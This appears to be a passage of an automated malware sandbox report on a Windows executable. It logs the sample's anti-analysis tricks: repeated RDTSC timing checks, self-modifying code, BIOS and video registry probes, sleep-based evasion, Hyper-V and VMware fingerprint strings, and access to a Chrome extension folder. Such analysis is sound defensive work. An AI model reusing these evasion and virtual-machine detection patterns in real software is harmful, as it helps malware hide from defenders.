              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C4508 second address: 6C4538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F29453582DCh 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C4538 second address: 6C4552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2944535536h 0x0000000a pop ebx 0x0000000b push ebx 0x0000000c jl 00007F2944535536h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ebx 0x00000015 popad 0x00000016 push esi 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C4552 second address: 6C4563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F29453582D6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C4563 second address: 6C4567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C8B93 second address: 6C8BA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29453582E1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C8EEE second address: 6C8EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6CA8D5 second address: 6CA8F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E6h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F29453582E2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6CA8F9 second address: 6CA8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6CA8FF second address: 6CA92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F29453582E4h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 jnc 00007F29453582D6h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F099A second address: 49F09B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 499078A second address: 4990790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4990790 second address: 49907F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F2944535544h 0x00000014 sub si, B9E8h 0x00000019 jmp 00007F294453553Bh 0x0000001e popfd 0x0000001f jmp 00007F2944535548h 0x00000024 popad 0x00000025 and esp, FFFFFFF8h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F294453553Ah 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49907F4 second address: 49907F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49907F8 second address: 49907FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49907FE second address: 4990804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0D1F second address: 49F0D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0D23 second address: 49F0D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [ebp-00000118h], eax 0x0000000d jmp 00007F294453553Eh 0x00000012 test eax, eax 0x00000014 jmp 00007F2944535540h 0x00000019 je 00007F29B6A878A9h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F2944535547h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0D6F second address: 49F0D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582E4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0D87 second address: 49F0DC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F2944535546h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov ax, dx 0x00000016 mov dx, 8380h 0x0000001a popad 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0DC0 second address: 49F0DC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0DC6 second address: 49F0DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0DCC second address: 49F0DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0DD0 second address: 49F0DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0DD4 second address: 49F0DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea ecx, dword ptr [ebx+04h] 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f mov eax, edi 0x00000011 popad 0x00000012 push 00000027h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F29453582E0h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0DFA second address: 49F0E47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2944535541h 0x00000008 mov ebx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F294453553Fh 0x00000017 sub ah, 0000001Eh 0x0000001a jmp 00007F2944535549h 0x0000001f popfd 0x00000020 mov ah, A3h 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00735 second address: 4A0076B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 49FAh 0x00000007 jmp 00007F29453582DBh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushad 0x00000012 movzx ecx, bx 0x00000015 mov eax, ebx 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007F29453582DFh 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A0076B second address: 4A0076F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A0076F second address: 4A00773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00773 second address: 4A00779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00779 second address: 4A00796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582E9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A004A3 second address: 4A004A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A004A8 second address: 4A004F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, B9A8h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov bx, si 0x00000010 pushfd 0x00000011 jmp 00007F29453582E8h 0x00000016 adc si, 2C08h 0x0000001b jmp 00007F29453582DBh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F29453582E0h 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A004F8 second address: 4A004FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A004FC second address: 4A00502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00502 second address: 4A00508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00508 second address: 4A0050C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A0050C second address: 4A00510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00510 second address: 4A00535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F29453582E4h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00535 second address: 4A00539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00539 second address: 4A00556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00909 second address: 4A009DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2944535547h 0x00000009 or cx, D37Eh 0x0000000e jmp 00007F2944535549h 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007F294453553Dh 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 pushad 0x00000022 mov bx, si 0x00000025 call 00007F2944535546h 0x0000002a pop esi 0x0000002b popad 0x0000002c pushfd 0x0000002d jmp 00007F294453553Bh 0x00000032 add eax, 3AD8A2EEh 0x00000038 jmp 00007F2944535549h 0x0000003d popfd 0x0000003e popad 0x0000003f mov ebp, esp 0x00000041 jmp 00007F294453553Eh 0x00000046 mov ecx, dword ptr [ebp+08h] 0x00000049 jmp 00007F2944535540h 0x0000004e test ecx, ecx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F2944535547h 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A009DF second address: 4A00A0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov di, 9B36h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F29B68DA52Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F29453582E8h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00A0B second address: 4A00A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00A11 second address: 4A00A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00A15 second address: 4A00A19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49C09C4 second address: 49C09C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49C09C8 second address: 49C09CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exe Special instruction interceptor: First address: 42C955 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\random(2).exe Special instruction interceptor: First address: 42C9F6 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\random(2).exe Special instruction interceptor: First address: 5D83D8 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\random(2).exe Special instruction interceptor: First address: 5D86FA instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\random(2).exe Special instruction interceptor: First address: 42A2F6 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\random(2).exe Special instruction interceptor: First address: 66B584 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\random(2).exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\random(2).exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\random(2).exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\random(2).exe TID: 6216 Thread sleep count: 39 > 30
              Source: C:\Users\user\Desktop\random(2).exe TID: 6216 Thread sleep time: -78039s >= -30000s
              Source: C:\Users\user\Desktop\random(2).exe TID: 6188 Thread sleep count: 38 > 30
              Source: C:\Users\user\Desktop\random(2).exe TID: 6188 Thread sleep time: -76038s >= -30000s
              Source: C:\Users\user\Desktop\random(2).exe TID: 6264 Thread sleep count: 46 > 30
              Source: C:\Users\user\Desktop\random(2).exe TID: 6264 Thread sleep time: -92046s >= -30000s
              Source: C:\Users\user\Desktop\random(2).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
              Source: C:\Users\user\Desktop\random(2).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
              Source: C:\Users\user\Desktop\random(2).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
              Source: C:\Users\user\Desktop\random(2).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
              Source: C:\Users\user\Desktop\random(2).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
              Source: C:\Users\user\Desktop\random(2).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partitionll]
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration ServiceY
              Source: chrome.exe, 0000000C.00000003.2432227323.00000249D6721000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434425374.00000249D6721000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2430756068.00000249D6721000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root PartitionRH
              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition
              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
              Source: chrome.exe, 0000000C.00000003.2433036035.00000249D9BB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count 
Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flus
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor9
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
              Source: chrome.exe, 0000000C.00000003.2430674176.00000249D9C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Sched
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partition
              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
              Source: chrome.exe, 0000000C.00000003.2432227323.00000249D6769000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2646823383.00000249D6769000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V hjyxccxlsbpgevf Bus
              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V hjyxccxlsbpgevf Bus Pipes
              Source: chrome.exe, 0000000C.00000003.2389764630.00003CCC00314000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor]
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D669B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
              Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition|xG.
              Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus PipesJ
              Source: chrome.exe, 0000000C.00000003.2430624506.00000249D9C13000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434128229.00000249D9C13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840
